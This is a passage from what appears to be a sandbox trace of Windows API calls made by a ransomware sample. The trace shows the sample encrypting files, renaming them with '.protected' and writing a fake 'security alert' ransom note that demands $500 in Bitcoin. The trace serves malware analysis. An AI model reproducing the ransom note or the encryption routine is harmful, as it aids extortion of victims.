dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.657] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0084.657] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0084.657] CloseHandle (hObject=0x150) returned 1 [0084.657] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini.protected") returned 100 [0084.657] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\desktop.ini.protected")) returned 1 [0084.658] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.658] lstrcmpiW (lpString1="fwlink[1]", lpString2="Windows") returned -1 [0084.658] lstrcmpiW (lpString1="fwlink[1]", lpString2="Program Files") returned -1 [0084.658] lstrcmpiW (lpString1="fwlink[1]", lpString2="Program Files (x86)") returned -1 [0084.658] lstrcmpiW (lpString1="fwlink[1]", lpString2="$Recycle.bin") returned 1 [0084.658] lstrcmpiW (lpString1="fwlink[1]", lpString2="System Volume Information") returned -1 [0084.658] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1]") returned 88 [0084.658] StrStrIW (lpFirst="fwlink[1]", lpSrch=".protected") returned 0x0 [0084.658] lstrcmpW (lpString1="fwlink[1]", lpString2="RESTORE_FILES.txt") returned -1 [0084.658] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.658] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.658] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds 
Cache\\6ASVN7J7\\fwlink[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\fwlink[1]"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.659] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1]") returned 88 [0084.659] StrStrW (lpFirst="fwlink[1]", lpSrch=".txt") returned 0x0 [0084.659] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1]") returned 88 [0084.659] StrStrW (lpFirst="fwlink[1]", lpSrch=".rar") returned 0x0 [0084.659] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1]") returned 88 [0084.659] StrStrW (lpFirst="fwlink[1]", lpSrch=".zip") returned 0x0 [0084.659] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x0, lpOverlapped=0x0) returned 1 [0084.659] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.659] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x0, lpOverlapped=0x0) returned 1 [0084.659] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.659] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0084.660] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, 
nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0084.660] CloseHandle (hObject=0x150) returned 1 [0084.661] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1].protected") returned 98 [0084.661] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\fwlink[1]"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1].protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\fwlink[1].protected")) returned 1 [0084.661] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0084.661] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0084.661] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\RESTORE_FILES.txt") returned 96 [0084.661] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0084.670] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.670] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0084.671] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.671] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0084.671] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.671] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0084.671] CloseHandle (hObject=0x14c) returned 1 [0084.672] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.672] lstrcmpiW (lpString1="D68G7BIJ", lpString2="Windows") returned -1 [0084.673] lstrcmpiW (lpString1="D68G7BIJ", lpString2="Program Files") returned -1 [0084.673] lstrcmpiW (lpString1="D68G7BIJ", lpString2="Program Files (x86)") returned -1 [0084.673] lstrcmpiW (lpString1="D68G7BIJ", lpString2="$Recycle.bin") returned 1 [0084.673] lstrcmpiW (lpString1="D68G7BIJ", lpString2="System Volume Information") 
returned -1 [0084.673] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ") returned 78 [0084.673] lstrcmpW (lpString1="D68G7BIJ", lpString2=".") returned 1 [0084.673] lstrcmpW (lpString1="D68G7BIJ", lpString2="..") returned 1 [0084.673] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\*") returned 80 [0084.673] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0084.673] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.673] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.673] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.673] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.673] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.674] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\.") returned 80 [0084.674] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.674] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0084.674] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0084.674] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.674] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.674] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.674] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.674] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.674] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.674] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.674] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.674] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.674] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\..") returned 81 [0084.674] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.674] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.674] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0084.674] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0084.674] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.674] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.674] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\.." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.674] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.674] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0084.674] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0084.674] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0084.674] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0084.674] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0084.674] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini") returned 90 [0084.674] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0084.675] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0084.675] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.675] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.675] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.675] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini") returned 90 [0084.675] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0084.675] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini") returned 90 [0084.675] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0084.675] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini") returned 90 [0084.675] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0084.675] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x43, lpOverlapped=0x0) returned 1 [0084.676] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffffbd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.676] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x43, lpOverlapped=0x0) returned 1 [0084.676] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.676] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0084.677] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0084.677] CloseHandle (hObject=0x150) returned 1 [0084.677] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini.protected") returned 100 [0084.677] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\desktop.ini.protected")) returned 1 [0084.678] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.678] lstrcmpiW (lpString1="fwlink[1]", lpString2="Windows") returned -1 [0084.678] lstrcmpiW (lpString1="fwlink[1]", lpString2="Program Files") returned -1 [0084.678] lstrcmpiW (lpString1="fwlink[1]", lpString2="Program Files (x86)") returned -1 [0084.678] lstrcmpiW (lpString1="fwlink[1]", lpString2="$Recycle.bin") returned 1 [0084.678] lstrcmpiW (lpString1="fwlink[1]", lpString2="System Volume Information") returned -1 [0084.678] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1]") returned 88 [0084.678] StrStrIW (lpFirst="fwlink[1]", lpSrch=".protected") returned 0x0 [0084.678] lstrcmpW (lpString1="fwlink[1]", lpString2="RESTORE_FILES.txt") returned -1 [0084.678] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.678] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.678] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds 
Cache\\D68G7BIJ\\fwlink[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\fwlink[1]"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.679] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1]") returned 88 [0084.679] StrStrW (lpFirst="fwlink[1]", lpSrch=".txt") returned 0x0 [0084.679] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1]") returned 88 [0084.679] StrStrW (lpFirst="fwlink[1]", lpSrch=".rar") returned 0x0 [0084.679] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1]") returned 88 [0084.679] StrStrW (lpFirst="fwlink[1]", lpSrch=".zip") returned 0x0 [0084.679] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x0, lpOverlapped=0x0) returned 1 [0084.679] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.679] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x0, lpOverlapped=0x0) returned 1 [0084.680] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.680] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0084.680] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, 
nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0084.680] CloseHandle (hObject=0x150) returned 1 [0084.681] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1].protected") returned 98 [0084.681] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\fwlink[1]"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1].protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\fwlink[1].protected")) returned 1 [0084.682] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0084.682] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0084.682] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\RESTORE_FILES.txt") returned 96 [0084.682] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0084.691] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% 